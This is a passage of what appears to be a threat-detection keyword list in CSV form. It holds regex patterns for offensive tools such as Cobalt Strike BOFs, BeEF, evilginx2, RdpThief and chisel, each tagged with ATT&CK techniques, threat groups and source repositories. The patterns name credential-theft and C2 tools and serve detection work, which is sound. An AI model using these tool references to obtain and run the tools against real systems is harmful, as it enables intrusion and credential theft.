FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*BeaconNote.cna*",".{0,1000}BeaconNote\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","10","10","150","40","2023-12-01T03:18:35Z","2019-02-22T09:36:44Z" "*BeaconNotify.cna*",".{0,1000}BeaconNotify\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","10","10","150","40","2023-12-01T03:18:35Z","2019-02-22T09:36:44Z" "*BeaconObject.cs*",".{0,1000}BeaconObject\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*BeaconOutputStreamW*",".{0,1000}BeaconOutputStreamW.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","214","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" "*BeaconOutputWriter.cs*",".{0,1000}BeaconOutputWriter\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*BeaconPrintf(*",".{0,1000}BeaconPrintf\(.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","10","10","85","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" "*BeaconPrintf*",".{0,1000}BeaconPrintf.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*BeaconPrintToStreamW*",".{0,1000}BeaconPrintToStreamW.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","214","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" "*BeaconSpawnTemporaryProcess*",".{0,1000}BeaconSpawnTemporaryProcess.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*BeaconSpawnTemporaryProcess*",".{0,1000}BeaconSpawnTemporaryProcess.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*BeaconTool -*",".{0,1000}BeaconTool\s\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*BeaconTool -i online_info.txt -aes decrypt*",".{0,1000}BeaconTool\s\-i\sonline_info\.txt\s\-aes\sdecrypt.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*BeaconTool/lib/sleep.jar*",".{0,1000}BeaconTool\/lib\/sleep\.jar.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*BeaconUseToken*",".{0,1000}BeaconUseToken.{0,1000}","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/BOF-RegSave","1","1","N/A","10","10","177","30","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z" "*Beau Bullock (@dafthack)*",".{0,1000}Beau\sBullock\s\(\@dafthack\).{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*beb285e40caf95bcc1552fc293194fa29275e3cdb9c62ef752b62257f6480aaf*",".{0,1000}beb285e40caf95bcc1552fc293194fa29275e3cdb9c62ef752b62257f6480aaf.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*beb3dbf652aedb556fee96e7add11e5aa76be4028107fd1cf80066fe3479f43a*",".{0,1000}beb3dbf652aedb556fee96e7add11e5aa76be4028107fd1cf80066fe3479f43a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*BEB67A6E-4C54-4DE5-8C6B-2C12F44A7B92*",".{0,1000}BEB67A6E\-4C54\-4DE5\-8C6B\-2C12F44A7B92.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*beb982a616c2c4cd716387b6a4c7a4b86ddcca0bc76faa94b4c5f10ed7abd592*",".{0,1000}beb982a616c2c4cd716387b6a4c7a4b86ddcca0bc76faa94b4c5f10ed7abd592.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*BEBE6A01-0C03-4A7C-8FE9-9285F01C0B03*",".{0,1000}BEBE6A01\-0C03\-4A7C\-8FE9\-9285F01C0B03.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","0","N/A","10","10","1073","343","2019-11-13T14:13:52Z","2019-11-03T17:54:38Z" "*bed39aa210495c7abbcea21448c62a2ac5a90eaa4d6d3d315f2a09273279af90*",".{0,1000}bed39aa210495c7abbcea21448c62a2ac5a90eaa4d6d3d315f2a09273279af90.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*bee12d2a87cfe2fccb8e9c81b1f3202c4101568d71b5434a04e59f6768730af2*",".{0,1000}bee12d2a87cfe2fccb8e9c81b1f3202c4101568d71b5434a04e59f6768730af2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*beef:beef*",".{0,1000}beef\:beef.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*beef_bind_tcp-stage.asm*",".{0,1000}beef_bind_tcp\-stage\.asm.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*beef_bind_tcp-stager.asm*",".{0,1000}beef_bind_tcp\-stager\.asm.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*beef_bind-stage*.rb*",".{0,1000}beef_bind\-stage.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*beef_bind-stage.asm*",".{0,1000}beef_bind\-stage\.asm.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*beef_bind-stager.asm*",".{0,1000}beef_bind\-stager\.asm.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*beef_test.rb*",".{0,1000}beef_test\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*beefproject*",".{0,1000}beefproject.{0,1000}","offensive_tool_keyword","beef","The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1210 - T1216 - T1207 - T1189 - T1190 - T1566","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*beef-xss*",".{0,1000}beef\-xss.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*Beelogger*",".{0,1000}Beelogger.{0,1000}","offensive_tool_keyword","BeeLogger","Keylogger generator. fake office and acrobat file and malicious executables generator","T1056 - T1105 - T1204 - T1106","TA0003 - TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/4w4k3/BeeLogger","1","1","N/A","N/A","10","974","321","2022-12-02T19:42:41Z","2017-02-17T15:34:39Z" "*BeetleChunks/SpoolSploit*",".{0,1000}BeetleChunks\/SpoolSploit.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - 